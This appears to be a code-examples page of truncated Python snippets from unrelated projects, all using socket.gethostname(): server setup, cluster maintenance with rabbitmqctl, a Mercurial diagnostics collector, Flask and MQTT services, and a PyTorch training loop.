		print("connect to", (host, port))
		self.init_frame()
		return True
Example #33

import json
import socket
import sys

own_ip = socket.gethostbyname(socket.gethostname())

config = {
    "pebble": {
        "listenAddress": "0.0.0.0:14000",
        "managementListenAddress": "0.0.0.0:15000",
        "certificate": "test/certs/localhost/cert.pem",
        "privateKey": "test/certs/localhost/key.pem",
        "httpPort": 5000,
        "tlsPort": 5001,
        "ocspResponderURL":
        "http://{0}:5000/ocsp".format(own_ip),  # will be added later
        "externalAccountBindingRequired": False,
        "externalAccountMACKeys": {
            "kid-1":
            "zWNDZM6eQGHWpSRTPal5eIUYFTu7EajVIoguysqZ9wG44nMEtx3MUAsUDkMTQ12W",
Example #34
    variables.update(TF_VAR_panorama_bootstrap_key=bootstrap_key.read())

    # Generate a new RSA keypair to use to SSH to the VM. If you are using your own automation outside of
    # Panhandler then you should use your own keys.
    if os.path.exists(shared_wdir + 'id_rsa') is True:
        print('Crypto Key exists already, skipping....')
        public_key = open(shared_wdir + 'pub', 'r')
        # Add the public key to the variables sent to Terraform so it can create the GCP key pair.
        variables.update(TF_VAR_ra_key=public_key.read())

    # Init terraform with the modules and providers. The container will have the same volumes as Panhandler.
    # This allows it to access the files Panhandler downloaded from the GIT repo.
    container = client.containers.run('tjschuler/terraform-gcloud',
                                      'terraform init -no-color -input=false',
                                      auto_remove=True,
                                      volumes_from=socket.gethostname(),
                                      working_dir=wdir,
                                      environment=variables,
                                      detach=True)
    # Monitor the log so that the user can see the console output during the run versus waiting until it is complete.
    # The container stops and is removed once the run is complete and this loop will exit at that time.
    for line in container.logs(stream=True):
        print(line.decode('utf-8').strip())
    # Run terraform apply
    container = client.containers.run(
        'tjschuler/terraform-gcloud',
        'terraform apply -auto-approve -no-color -input=false',
        auto_remove=True,
        volumes_from=socket.gethostname(),
        working_dir=wdir,
        environment=variables,
        detach=True)

Example #35
    arg_names = [
        'path_nodes',
        'path_edges',
        'graph_id',
        'partition_id',
        'num_clients',
        'num_rounds',
        'IP',
        'PORT'
        ]

    args = dict(zip(arg_names, sys.argv[1:]))

    logging.warning('####################################### New Training Session #######################################')
    logging.info('Server started , graph ID %s, number of clients %s, number of rounds %s',args['graph_id'],args['num_clients'],args['num_rounds'])

    if 'IP' not in args.keys()  or args['IP'] == 'localhost':
        args['IP'] = socket.gethostname()

    if 'PORT' not in args.keys():
        args['PORT'] = 5000

    path_nodes = args['path_nodes'] + args['graph_id'] + '_nodes_' + args['partition_id'] + ".csv"
    nodes = pd.read_csv(path_nodes,index_col=0)
    #nodes = nodes.astype("float32")

    path_edges = args['path_edges'] + args['graph_id'] + '_edges_' + args['partition_id'] + ".csv"
    edges = pd.read_csv(path_edges)
    #edges = edges.astype({"source":"uint32","target":"uint32"})
    
   
    model = Model(nodes,edges)
    model.initialize()
Example #36
import socket  ## Import the socket module, which will allow the connections

s = socket.socket() ## Assign "s" to the socket to create the object
host = socket.gethostname() ## host receives the address of the program
port = 8080  ## Port 8080 is set here, but it could be any other port you want.
s.bind((host, port))  ## Bind the host and the port to the socket
s.listen(1) ## Here we listen for an incoming connection
print(host) ## Print the server address, which the client will use to connect to the server
print("Waiting for any incoming connection ...")  ## Print the message that we are waiting for an incoming connection
conn, addr = s.accept()  ## Accept all connections
print(addr, "connected to the server!") ## Print the address of the client that makes the connection

## CREATING THE FILE FOR TRANSFER
## Here the user enters a string with the name of the file they want, saved in filename
filename = input(str("Please enter the name of the txt file you want to receive :   "))
file = open(filename , 'rb') ## Open the file in byte-read mode.
file_data = file.read(1024)
conn.send(file_data) ## Tell the connection to send the data to the client
print("The data was transmitted successfully!") ## If the data is transmitted, print the success message
Example #37

from __future__ import division
import os
from numbers import Number

from zprocess import zmq_get
from labscript_utils.labconfig import LabConfig, config_prefix
import socket

__version__ = '1.0.0'

_exp_config = LabConfig(
    os.path.join(config_prefix, '%s.ini' % socket.gethostname()))


class MiseParameter(object):
    def __init__(self, min, max, mutation_rate=None, log=False, initial=None):

        # Check for valid min and max
        if not isinstance(min, Number) or not isinstance(
                max, Number) or not max > min:
            raise ValueError(
                'MiseParameter must have unequal numerical min and max values, with min < max.'
            )

        # Set default mutation rate if unset:
        if mutation_rate is None:
            mutation_rate = (max - min) / 10
Example #38
    parser.add_argument('--n_iter', '-n', type=int, default=1000)
    parser.add_argument('--n_directions', '-nd', type=int, default=8)
    parser.add_argument('--deltas_used', '-du', type=int, default=8)
    parser.add_argument('--step_size', '-s', type=float, default=0.02)
    parser.add_argument('--delta_std', '-std', type=float, default=.03)
    parser.add_argument('--n_workers', '-e', type=int, default=6)
    parser.add_argument('--rollout_length', '-r', type=int, default=5000)

    # for Swimmer-v1 and HalfCheetah-v1 use shift = 0
    # for Hopper-v1, Walker2d-v1, and Ant-v1 use shift = 1
    # for Humanoid-v1 used shift = 5
    parser.add_argument('--shift', type=float, default=1)
    parser.add_argument('--seed', type=int, default=237)
    parser.add_argument('--policy_type', type=str, default='linear')
    parser.add_argument('--dir_path',
                        type=str,
                        default='trained_policies/Madras-explore7')
    parser.add_argument('--logdir',
                        type=str,
                        default='trained_policies/Madras-explore7')

    # for ARS V1 use filter = 'NoFilter'
    parser.add_argument('--filter', type=str, default='MeanStdFilter')

    local_ip = socket.gethostbyname(socket.gethostname())
    ray.init(redis_address="10.32.6.37:6382")

    args = parser.parse_args()
    params = vars(args)
    run_ars(params)
Example #39
from netaddr import IPNetwork

from datastore_libnetwork import LibnetworkDatastoreClient
from pycalico.datastore_errors import DataStoreError
from pycalico.datastore_datatypes import IF_PREFIX, Endpoint
from pycalico import netns


FIXED_MAC = "EE:EE:EE:EE:EE:EE"
CONTAINER_NAME = "libnetwork"
ORCHESTRATOR_ID = "docker"

# How long to wait (seconds) for IP commands to complete.
IP_CMD_TIMEOUT = 5

hostname = socket.gethostname()
client = LibnetworkDatastoreClient()

# Return all errors as JSON. From http://flask.pocoo.org/snippets/83/
def make_json_app(import_name, **kwargs):
    """
    Creates a JSON-oriented Flask app.

    All error responses that you don't specifically
    manage yourself will have application/json content
    type, and will contain JSON like this (just an example):

    { "Err": "405: Method Not Allowed" }
    """
    def make_json_error(ex):
        response = jsonify({"Err":str(ex)})
Example #40
               default='mysql://*****:*****@localhost/heat',
               help='The SQLAlchemy connection string used to connect to the '
               'database'),
    cfg.IntOpt('sql_idle_timeout',
               default=3600,
               help='timeout before idle sql connections are reaped'),
]
engine_opts = [
    cfg.StrOpt('instance_driver',
               default='heat.engine.nova',
               help='Driver to use for controlling instances')
]
rpc_opts = [
    cfg.StrOpt(
        'host',
        default=socket.gethostname(),
        help='Name of the engine node.  This can be an opaque identifier.'
        'It is not necessarily a hostname, FQDN, or IP address.'),
    cfg.StrOpt('engine_topic',
               default='engine',
               help='the topic engine nodes listen on')
]


def register_metadata_opts():
    cfg.CONF.register_opts(service_opts)
    cfg.CONF.register_opts(bind_opts)
    cfg.CONF.register_opts(rpc_opts)


def register_api_opts():
Example #41
import time
import socket
import json
import cv2
import queue
import numpy as np

import logging as log
import paho.mqtt.client as mqtt

from argparse import ArgumentParser
from inference import Network

# MQTT server environment variables
HOSTNAME = socket.gethostname()
IPADDRESS = socket.gethostbyname(HOSTNAME)
MQTT_HOST = IPADDRESS
MQTT_PORT = 3001
MQTT_KEEPALIVE_INTERVAL = 60

SECUENCIAL_SAFE_FRAMES = 10


def build_argparser():
    """
    Parse command line arguments.

    :return: command line arguments
    """
    parser = ArgumentParser()
Example #42
def getMyName():
	hostname = socket.gethostname()
	return hostname
Example #43
def catchall_signal_lh(*args, **kwargs):

    def bash_command(cmd):
        p = subprocess.Popen(cmd, env=env, shell=True,
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE)
        out, err = p.communicate()
        my_logger.debug('Command %s' % cmd)
        if out != '':
            my_logger.debug('  Stdout: %s' % out)
        if err != '':
            my_logger.debug('  Stderr: %s' % err)
        return out.strip()

    message = kwargs['message']
    action = args[3]
    if kwargs['type'] == 'NodeStateChange' and action == 'left':
        node = args[0]
        this_node = socket.gethostname().split('.')[0]
        node_name = node.split('.')[0]
        cmd = 'cat /etc/rabbitmq/node_name_prefix_for_messaging 2>/dev/null'
        node_name_prefix = bash_command(cmd)
        if node_name_prefix == 'nil' or node_name_prefix in node_name:
            node_name_prefix = ''
        node_to_remove = 'rabbit@%s%s' % (node_name_prefix, node_name)

        my_logger.info("Got %s that left cluster" % node)
        my_logger.debug(kwargs)
        for arg in message.get_args_list():
            my_logger.debug("        " + str(arg))
        my_logger.info("Preparing to fence node %s from rabbit cluster"
                       % node_to_remove)

        if node == '' or re.search('\\b%s\\b' % this_node, node_name):
            my_logger.debug('Ignoring the node %s' % node_to_remove)
            return

        # NOTE(bogdando) when the rabbit node went down, its status
        # remains 'running' for a while, so few retries are required
        count = 0
        while True:
            cmd = ('rabbitmqctl eval '
                   '"mnesia:system_info(running_db_nodes)."'
                   '| grep -o %s') % node_to_remove
            results = bash_command(cmd)
            is_running = results != ''

            if not is_running or count >= 5:
                break

            count += 1
            time.sleep(10)

        if is_running:
            my_logger.warn('Ignoring alive node %s' % node_to_remove)
            return

        cmd = ('rabbitmqctl eval '
               '"mnesia:system_info(db_nodes)."'
               '| grep -o %s') % node_to_remove

        results = bash_command(cmd)
        in_cluster = results != ''

        if not in_cluster:
            my_logger.debug('Ignoring forgotten node %s' % node_to_remove)
            return

        my_logger.info('Disconnecting node %s' % node_to_remove)
        cmd = ('rabbitmqctl eval "disconnect_node'
               '(list_to_atom(\\"%s\\"))."') % node_to_remove
        bash_command(cmd)

        my_logger.info('Forgetting cluster node %s' % node_to_remove)
        cmd = 'rabbitmqctl forget_cluster_node %s' % node_to_remove
        bash_command(cmd)
Example #44
def _makerage(ui, repo, **opts):
    configoverrides = {
        # Make graphlog shorter.
        ("experimental", "graphshorten"):
        "1",
        # Force use of lines-square renderer, as the user's configuration may
        # not render properly in a text file.
        ("experimental", "graph.renderer"):
        "lines-square",
        # Reduce the amount of data used for debugnetwork speed tests to
        # increase the chance they complete within 20s.
        ("debugnetwork", "speed-test-download-size"):
        "4M",
        ("debugnetwork", "speed-test-upload-size"):
        "1M",
    }

    # Override the encoding to "UTF-8" to generate the rage in UTF-8.
    oldencoding = encoding.encoding
    oldencodingmode = encoding.encodingmode
    encoding.encoding = "UTF-8"
    encoding.encodingmode = "replace"

    def hgcmd(cmdname, *args, **additional_opts):
        cmd, opts = cmdutil.getcmdanddefaultopts(cmdname, commands.table)
        opts.update(additional_opts)

        _repo = repo
        if "_repo" in opts:
            _repo = opts["_repo"]
            del opts["_repo"]
        # If we failed to popbuffer for some reason, do not mess up with the
        # main `ui` object.
        newui = ui.copy()
        newui.pushbuffer(error=True, subproc=True)
        newui._colormode = None

        def remoteui(orig, src, opts):
            rui = orig(src, opts)
            rui._outputui = newui
            return rui

        try:
            with newui.configoverride(configoverrides,
                                      "rage"), extensions.wrappedfunction(
                                          hg, "remoteui", remoteui):
                if cmd.norepo:
                    cmd(newui, *args, **opts)
                else:
                    cmd(newui, _repo, *args, **opts)
        finally:
            return newui.popbuffer()

    basic = [
        ("date", lambda: time.ctime()),
        ("unixname", lambda: encoding.environ.get("LOGNAME")),
        ("hostname", lambda: socket.gethostname()),
        ("repo location", lambda: repo.root),
        ("cwd", lambda: pycompat.getcwd()),
        ("fstype", lambda: util.getfstype(repo.root)),
        ("active bookmark",
         lambda: bookmarks._readactive(repo, repo._bookmarks)),
        (
            "hg version",
            lambda: __import__("edenscm.mercurial.__version__").mercurial.
            __version__.version,
        ),
    ]

    detailed = [
        ("df -h", lambda: shcmd("df -h", check=False)),
        # smartlog as the user sees it
        ("hg sl", lambda: hgcmd("smartlog", template="{sl_debug}")),
        (
            "hg debugmetalog -t 'since 2d ago'",
            lambda: hgcmd("debugmetalog", time_range=["since 2d ago"]),
        ),
        (
            'first 20 lines of "hg status"',
            lambda: "\n".join(hgcmd("status").splitlines()[:20]),
        ),
        (
            "hg debugmutation -r 'draft() & date(-4)' -t 'since 4d ago'",
            lambda: hgcmd("debugmutation",
                          rev=["draft() & date(-4)"],
                          time_range=["since 4d ago"]),
        ),
        ("sigtrace", lambda: readsigtraces(repo)),
        (
            "hg blackbox",
            lambda: "\n".join(
                hgcmd("blackbox", pattern=BLACKBOX_PATTERN).splitlines()[-500:]
            ),
        ),
        ("hg summary", lambda: hgcmd("summary")),
        ("hg cloud status", lambda: hgcmd("cloud status")),
        ("hg debugprocesstree", lambda: hgcmd("debugprocesstree")),
        ("hg config (local)", lambda: "\n".join(localconfig(ui))),
        ("hg sparse", lambda: hgcmd("sparse")),
        ("hg debugchangelog", lambda: hgcmd("debugchangelog")),
        ("hg debuginstall", lambda: hgcmd("debuginstall")),
        ("hg debugdetectissues", lambda: hgcmd("debugdetectissues")),
        ("usechg", usechginfo),
        (
            "uptime",
            lambda: shcmd("wmic path Win32_OperatingSystem get LastBootUpTime"
                          if pycompat.iswindows else "uptime"),
        ),
        ("rpm info", (partial(rpminfo, ui))),
        ("klist", lambda: shcmd("klist", check=False)),
        ("ifconfig", lambda: shcmd("ipconfig"
                                   if pycompat.iswindows else "ifconfig")),
        (
            "airport",
            lambda: shcmd(
                "/System/Library/PrivateFrameworks/Apple80211." +
                "framework/Versions/Current/Resources/airport " + "--getinfo",
                check=False,
            ),
        ),
        ("hg debugnetwork", lambda: hgcmd("debugnetwork")),
        ("infinitepush backup state",
         lambda: readinfinitepushbackupstate(repo)),
        ("commit cloud workspace sync state",
         lambda: readcommitcloudstate(repo)),
        (
            "infinitepush / commitcloud backup logs",
            lambda: infinitepushbackuplogs(ui, repo),
        ),
        ("scm daemon logs", lambda: scmdaemonlog(ui, repo)),
        ("debugstatus", lambda: hgcmd("debugstatus")),
        ("debugtree", lambda: hgcmd("debugtree")),
        ("hg config (all)", lambda: "\n".join(allconfig(ui))),
        ("edenfs rage", lambda: shcmd("edenfsctl rage --stdout")),
        (
            "environment variables",
            lambda: "\n".join(
                sorted([
                    "{}={}".format(k, v) for k, v in encoding.environ.items()
                ])),
        ),
        ("ssh config",
         lambda: shcmd("ssh -G hg.vip.facebook.com", check=False)),
        ("debuglocks", lambda: hgcmd("debuglocks")),
    ]

    msg = ""

    if util.safehasattr(repo, "name"):
        # Add the contents of both local and shared pack directories.
        packlocs = {
            "local":
            lambda category: shallowutil.getlocalpackpath(
                repo.svfs.vfs.base, category),
            "shared":
            lambda category: shallowutil.getcachepackpath(repo, category),
        }

        for loc, getpath in pycompat.iteritems(packlocs):
            for category in constants.ALL_CATEGORIES:
                path = getpath(category)
                detailed.append((
                    "%s packs (%s)" % (loc, constants.getunits(category)),
                    lambda path=path: "%s:\n%s" % (
                        path,
                        shcmd("dir /o-s %s" % os.path.normpath(path)
                              if pycompat.iswindows else "ls -lhS %s" % path),
                    ),
                ))

    footnotes = []
    timeout = opts.get("timeout") or 20

    def _failsafe(gen, timeout=timeout):
        class TimedOut(RuntimeError):
            pass

        def target(result, gen):
            try:
                result.append(gen())
            except TimedOut:
                return
            except Exception as ex:
                index = len(footnotes) + 1
                footnotes.append("[%d]: %s\n%s\n\n" %
                                 (index, str(ex), traceback.format_exc()))
                result.append("(Failed. See footnote [%d])" % index)

        result = []
        thread = threading.Thread(target=target, args=(result, gen))
        thread.daemon = True
        thread.start()
        thread.join(timeout)
        if result:
            value = result[0]
            return value
        else:
            if thread.is_alive():
                # Attempt to stop the thread, since hg is not thread safe.
                # There is no pure Python API to interrupt a thread.
                # But CPython C API can do that.
                ctypes.pythonapi.PyThreadState_SetAsyncExc(
                    ctypes.c_long(thread.ident), ctypes.py_object(TimedOut))
            return (
                "(Did not complete in %s seconds, rerun with a larger --timeout to collect this)"
                % timeout)
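The _failsafe helper above relies on CPython's PyThreadState_SetAsyncExc to interrupt a worker thread that outlives its timeout. A minimal, self-contained sketch of that technique (CPython-only, and best-effort: the target thread only sees the exception at its next bytecode boundary, so a blocking C call is not interrupted):

import ctypes
import threading
import time

class TimedOut(RuntimeError):
    pass

def interrupt_thread(thread, exc=TimedOut):
    # Ask the interpreter to raise `exc` inside `thread`.
    ctypes.pythonapi.PyThreadState_SetAsyncExc(
        ctypes.c_long(thread.ident), ctypes.py_object(exc))

def worker():
    try:
        while True:
            time.sleep(0.1)  # pure-Python loop, so it can be interrupted
    except TimedOut:
        print("worker interrupted")

t = threading.Thread(target=worker)
t.start()
time.sleep(0.5)
interrupt_thread(t)
t.join()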

    msg = []
    profile = []
    allstart = time.time()
    for name, gen in basic:
        msg.append("%s: %s\n\n" % (name, _failsafe(gen)))
    profile.append((time.time() - allstart, "basic info", None))
    for name, gen in detailed:
        start = time.time()
        with progress.spinner(ui, "collecting %r" % name):
            value = _failsafe(gen)
        finish = time.time()
        msg.append("%s: (%.2f s)\n---------------------------\n%s\n\n" %
                   (name, finish - start, value))
        profile.append((finish - start, name, value.count("\n")))
    allfinish = time.time()
    profile.append((allfinish - allstart, "total time", None))

    msg.append("hg rage profile:\n")
    width = max([len(name) for _t, name, _l in profile])
    for timetaken, name, lines in reversed(sorted(profile)):
        m = "  %-*s  %8.2f s" % (width + 1, name + ":", timetaken)
        if lines is not None:
            msg.append("%s for %4d lines\n" % (m, lines))
        else:
            msg.append("%s\n" % m)
    msg.append("\n")

    msg.extend(footnotes)
    msg = "".join(msg)

    encoding.encoding = oldencoding
    encoding.encodingmode = oldencodingmode
    return msg
Exemple #45
0
import os
import uuid
import time
import socket
import logging
from logging.handlers import RotatingFileHandler

from flask import Flask, url_for
from tasks import add_task

env = os.environ
app = Flask(__name__)

logger = logging.getLogger('app')
logger.setLevel(logging.DEBUG)
handler = RotatingFileHandler('log/app.log',
                              maxBytes=1024000 * 1024000,
                              backupCount=2)
logger.addHandler(handler)
container_id = socket.gethostname()


@app.route('/add/<int:param1>/<int:param2>/<param3>')
def add(param1, param2, param3):
    task = add_task.apply_async(args=[param1, param2],
                                kwargs={},
                                task_id=param3)
    # add.apply_async()
    # t1 = time.time()
    # task = celery.send_task('mytasks.add', args=[param1, param2], kwargs={}, task_id=str(uuid.uuid4()))
    # a = time.time() - t1
    # print(time.time() - t1)
    logger.info(container_id)
    return "<a href='{url}'>check status of {id} time add to queue </a>".format(
        id=task.id, url=url_for('check_task', id=task.id, _external=True))
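The route above links to a check_task endpoint that the snippet does not include. A plausible (hypothetical) companion route, reusing the app and add_task objects from the snippet, could poll the task via Celery's Task.AsyncResult:

@app.route('/check/<id>')
def check_task(id):
    # AsyncResult lets us query the state of a previously queued task by id.
    result = add_task.AsyncResult(id)
    if result.ready():
        return "task {0} finished with result: {1}".format(id, result.result)
    return "task {0} is currently {1}".format(id, result.state)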
Exemple #46
0
import os
import socket

def hello():
    html = "<h3>Hello {name}!</h3> <b>Hostname:</b> {hostname}<br/>"
    return html.format(name=os.getenv("NAME", "world"), hostname=socket.gethostname())
Exemple #47
0
import sys
import p1b1_runner
import json, os
import socket

if (len(sys.argv) < 3):
    print('requires arg1=param and arg2=filename')
    sys.exit(1)

parameterString = sys.argv[1]
filename = sys.argv[2]

# print (parameterString)
print("filename is " + filename)
print(socket.gethostname())

integs = [int(x) for x in parameterString.split(',')]
print(integs)

hyper_parameter_map = {'epochs': integs[0]}
hyper_parameter_map['framework'] = 'keras'
hyper_parameter_map['batch_size'] = integs[1]
hyper_parameter_map['dense'] = [integs[2], integs[3]]
hyper_parameter_map['run_id'] = parameterString
# hyper_parameter_map['instance_directory'] = os.environ['TURBINE_OUTPUT']
hyper_parameter_map['save'] = os.environ[
    'TURBINE_OUTPUT'] + "/output-" + os.environ['PMI_RANK']
sys.argv = ['p1b1_runner']
val_loss = p1b1_runner.run(hyper_parameter_map)
print(val_loss)
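For reference, an invocation of this wrapper might look like the following (the script name, paths, and values are hypothetical; TURBINE_OUTPUT and PMI_RANK are normally set by the workflow launcher). The comma-separated string maps to epochs=10, batch_size=64, dense=[500, 250]:

TURBINE_OUTPUT=/tmp/out PMI_RANK=0 python run_p1b1.py 10,64,500,250 params.json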
Exemple #48
0
    contexts = {v_thing_ID: context_vThing}

    port_mapping = db[thing_visor_collection].find_one(
        {"thingVisorID": thing_visor_ID}, {
            "port": 1,
            "_id": 0
        })
    poa_IP_dict = db[thing_visor_collection].find_one(
        {"thingVisorID": thing_visor_ID}, {
            "IP": 1,
            "_id": 0
        })
    poa_IP = str(poa_IP_dict['IP'])
    poa_port = port_mapping['port'][str(flask_port) + '/tcp']
    if not poa_IP:
        poa_IP = socket.gethostbyname(socket.gethostname())
    if not poa_port:
        poa_port = flask_port
    notification_URI = ["http://" + poa_IP + ":" + poa_port + "/notify"]

    # set v_thing_topic to the name of the MQTT topic on which to publish vThing data,
    # e.g. vThing/helloWorld/hello
    v_thing_topic = v_thing_prefix + "/" + v_thing_ID

    mqtt_control_client = mqtt.Client()
    mqtt_data_client = mqtt.Client()

    thread1 = httpThread()  # http server used to receive subscribed data
    thread1.start()

    mqtt_control_thread = mqttControlThread()  # mqtt control thread
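Note that the fallback socket.gethostbyname(socket.gethostname()) can resolve to 127.0.0.1 on hosts whose /etc/hosts maps the hostname to loopback. A common alternative (a sketch, not part of the original snippet) is the UDP-connect trick, which asks the OS for the outbound interface address without sending any packet:

import socket

def get_reachable_ip(probe_addr=("8.8.8.8", 80)):
    # "Connecting" a UDP socket never sends data, but it forces the OS
    # to select the outbound interface; its address is what peers can use.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(probe_addr)
        return s.getsockname()[0]
    finally:
        s.close()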
Exemple #49
0
def main():
    val_step = 10000
    val_steps = [10000,]
    train_step = 500


    hostname = socket.gethostname()

    args.stepvalues = [int(val) for val in args.step_values.split(',')]

    exp_name = '{}-{}-{}-{}--P{:d}-is{:d}-sl{:02d}-g{:d}-fs{:d}-{}-{:06d}'.format(args.dataset,args.datasubset,
                args.input, args.arch, args.pretrained, args.isize, args.seq_len, args.gap,
                                args.frame_step, args.batch_size, int(args.lr * 1000000))

    args.exp_name = exp_name
    args.root += args.dataset+'/'
    args.save_root += args.dataset+'/'
    model_save_dir = args.save_root + 'cache/' + exp_name
    if not os.path.isdir(model_save_dir):
        os.makedirs(model_save_dir)

    args.model_save_dir = model_save_dir
    # args.global_models_dir = os.path.expanduser(args.global_models_dir)

    if args.visdom:
        import visdom
        viz = visdom.Visdom()
        # ports = {'mars':8097,'sun':8096}
        viz.port = args.vis_port
        viz.env = exp_name

        # initialize visdom loss plot
        loss_plot = viz.line(
            X=torch.zeros((1,)).cpu(),
            Y=torch.zeros((1, 2)).cpu(),
            opts=dict(
                xlabel='Iteration',
                ylabel='Losses',
                title='Train & Val Losses',
                legend=['Train-Loss', 'Val-Loss']
            )
        )

        eval_plot = viz.line(
            X=torch.zeros((1,)).cpu(),
            Y=torch.zeros((1, 4)).cpu(),
            opts=dict(
                xlabel='Iteration',
                ylabel='Accuracy',
                title='Train & Val Accuracies',
                legend=['trainTop3', 'valTop3', 'trainTop1','valTop1']
            )
        )

    ## load dataloading configs
    input_size, means, stds = get_mean_size(args.arch)
    input_size = args.isize
    normalize = transforms.Normalize(mean=means,
                                     std=stds)

    # Data loading transform based on model type
    transform = transforms.Compose([transforms.ToTensor(), normalize])
    val_transform = transforms.Compose([transforms.Scale(int(input_size * 1.1)),
                                        transforms.CenterCrop(int(input_size)),
                                        transforms.ToTensor(),
                                        normalize,
                                        ])

    if args.arch.find('vgg') > -1:
        transform = BaseTransform(size=input_size,mean=means)
        val_transform = transform
        print('\n\ntransforms are going to be VGG type\n\n')
    subsets = ['train']
    # pdb.set_trace()
    train_dataset = KINETICS(args.root,
                             args.input,
                             transform,
                             dataset_name=args.dataset,
                             netname=args.arch,
                             datasubset=args.datasubset,
                             subsets=subsets,
                             scale_size=int(input_size*1.1),
                             input_size=int(input_size),
                             exp_name=exp_name,
                             frame_step=args.frame_step,
                             seq_len=args.seq_len,
                             gap=args.gap
                             )

    args.num_classes = train_dataset.num_classes
    print('Models will be cached in ', args.model_save_dir, 'has ', args.num_classes, ' classes')

    train_loader = torch.utils.data.DataLoader(train_dataset,
                                               batch_size=args.batch_size, shuffle=True,
                                               num_workers=args.workers, pin_memory=True
                                               )

    val_dataset = KINETICS(args.root,
                           args.input,
                           val_transform,
                           dataset_name=args.dataset,
                           netname=args.arch,
                           datasubset=args.datasubset,
                           subsets=['val',],
                           exp_name=exp_name,
                           scale_size=int(input_size * 1.1),
                           input_size=int(input_size),
                           frame_step=args.frame_step*4,
                           seq_len=args.seq_len,
                           gap=args.gap
                           )

    val_loader  = torch.utils.data.DataLoader(val_dataset,
                                              batch_size=args.batch_size, shuffle=False,
                                              num_workers=args.workers, pin_memory=True
                                              )

    model, criterion = initialise_model(args)

    parameter_dict = dict(model.named_parameters())
    params = []
    for name, param in parameter_dict.items():
        if name.find('bias') > -1:
            params += [{'params': [param], 'lr': args.lr*2, 'weight_decay': 0}]
        else:
            params += [{'params': [param], 'lr': args.lr, 'weight_decay':args.weight_decay}]


    optimizer = torch.optim.SGD(params, args.lr, momentum=args.momentum)
    scheduler = MultiStepLR(optimizer, milestones=args.stepvalues, gamma=args.gamma)

    if args.resume:
        latest_file_name = '{:s}/latest.pth'.format(args.model_save_dir)
        print('Resume model from ', latest_file_name)
        latest_dict = torch.load(latest_file_name)
        args.start_iteration = latest_dict['iteration'] + 1
        model.load_state_dict(torch.load(latest_dict['model_file_name']))
        optimizer.load_state_dict(torch.load(latest_dict['optimizer_file_name']))
        log_fid = open(args.model_save_dir + '/training.log', 'a')
        args.iteration = latest_dict['iteration']-1
        for _ in range(args.iteration):
            scheduler.step()
    else:
        log_fid = open(args.model_save_dir + '/training.log', 'w')

    log_fid.write(args.exp_name + '\n')
    for arg in vars(args):
        print(arg, getattr(args, arg))
        log_fid.write(str(arg) + ': ' + str(getattr(args, arg)) + '\n')

    log_fid.write(str(model))
    best_top1 = 0.0
    val_loss = 0.0
    val_top1 = 0.0
    val_top3 = 0.0
    batch_time = AverageMeter()
    data_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()
    top3 = AverageMeter()
    iteration = args.start_iteration
    approx_epochs = np.ceil(float(args.max_iterations-iteration)/len(train_loader))

    print('Approx Epochs to RUN: {}, Start Iteration {} Max iterations {} # of samples in dataset {}'.format(
        approx_epochs, iteration, args.max_iterations, len(train_loader)))
    epoch = -1
    if args.ngpu > 1:
        print('\n\nLets do dataparallel\n\n')
        model = torch.nn.DataParallel(model)

    model.train()
    model.apply(set_bn_eval)
    torch.cuda.synchronize()
    start = time.perf_counter()
    while iteration < args.max_iterations:
        epoch += 1
        for i, (batch, targets, __ , __) in enumerate(train_loader):
            if i<len(train_loader):
                if iteration > args.max_iterations:
                    break
                iteration += 1
                #pdb.set_trace()
                #print('input size ',batch.size())
                # 'async=True' is a syntax error on Python 3.7+; PyTorch >= 0.4 spells it non_blocking
                targets = targets.cuda(non_blocking=True)
                input_var = torch.autograd.Variable(batch.cuda(non_blocking=True))
                target_var = torch.autograd.Variable(targets)

                torch.cuda.synchronize()
                data_time.update(time.perf_counter() - start)

                # compute output
                output = model(input_var)
                loss = criterion(output, target_var)
                #pdb.set_trace()
                # measure accuracy and record loss
                prec1, prec3 = accuracy(output.data, targets, topk=(1, 3))
                losses.update(loss.item(), batch.size(0))
                top1.update(prec1[0], batch.size(0))
                top3.update(prec3[0], batch.size(0))

                # compute gradient and do SGD step
                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
                scheduler.step()
                # measure elapsed time
                torch.cuda.synchronize()
                batch_time.update(time.perf_counter() - start)
                start = time.perf_counter()
                if iteration % args.print_freq == 0:
                    line = 'Epoch: [{0}][{1}/{2}] Time {batch_time.val:.3f} ({batch_time.avg:.3f}) Data {data_time.val:.3f} ({data_time.avg:.3f})'.format(
                           epoch, iteration, len(train_loader), batch_time=batch_time, data_time=data_time)
                    line += ' Loss {loss.val:.4f} ({loss.avg:.4f}) Prec@1 {top1.val:.3f} ({top1.avg:.3f}) Prec@3 {top3.val:.3f} ({top3.avg:.3f})'.format(
                                loss=losses, top1=top1, top3=top3)
                    print(line)
                    log_fid.write(line+'\n')


                avgtop1 = top1.avg
                avgtop3 = top3.avg
                avgloss = losses.avg
                if (iteration % val_step == 0 or iteration in val_steps) and iteration > 0:
                    # evaluate on validation set
                    val_top1, val_top3, val_loss = validate(args, val_loader, model, criterion)
                    line = '\n\nValidation @ {:d}: Top1 {:.2f} Top3 {:.2f} Loss {:.3f}\n\n'.format(
                                iteration, val_top1, val_top3, val_loss)
                    print(line)
                    log_fid.write(line)
                    # remember best prec@1 and save checkpoint
                    is_best = val_top1 > best_top1
                    best_top1 = max(val_top1, best_top1)
                    torch.cuda.synchronize()
                    line = '\nBest Top1 sofar {:.3f} current top1 {:.3f} Time taken for Validation {:0.3f}\n\n'.format(best_top1, val_top1, time.perf_counter()-start)
                    log_fid.write(line + '\n')
                    print(line)
                    save_checkpoint({
                        'epoch': epoch,
                        'iteration': iteration,
                        'arch': args.arch,
                        'val_top1': val_top1,
                        'val_top3': val_top3,
                        'val_loss': val_loss,
                        'train_top1': avgtop1,
                        'train_top3': avgtop3,
                        'train_loss': avgloss,
                        'state_dict': model.state_dict(),
                        'optimizer' : optimizer.state_dict(),
                    }, is_best, args.model_save_dir)
                    if args.visdom:
                        viz.line(
                            X=torch.ones((1, 2)).cpu() * iteration,
                            Y=torch.Tensor([avgloss, val_loss]).unsqueeze(0).cpu(),
                            win=loss_plot,
                            update='append'
                        )
                        viz.line(
                            X=torch.ones((1, 4)).cpu() * iteration,
                            Y=torch.Tensor([avgtop3, val_top3, avgtop1, val_top1]).unsqueeze(0).cpu(),
                            win=eval_plot,
                            update='append'
                        )

                    model.train()
                    model.apply(set_bn_eval)

                if iteration % train_step == 0 and iteration > 0:
                    if args.visdom:
                        viz.line(
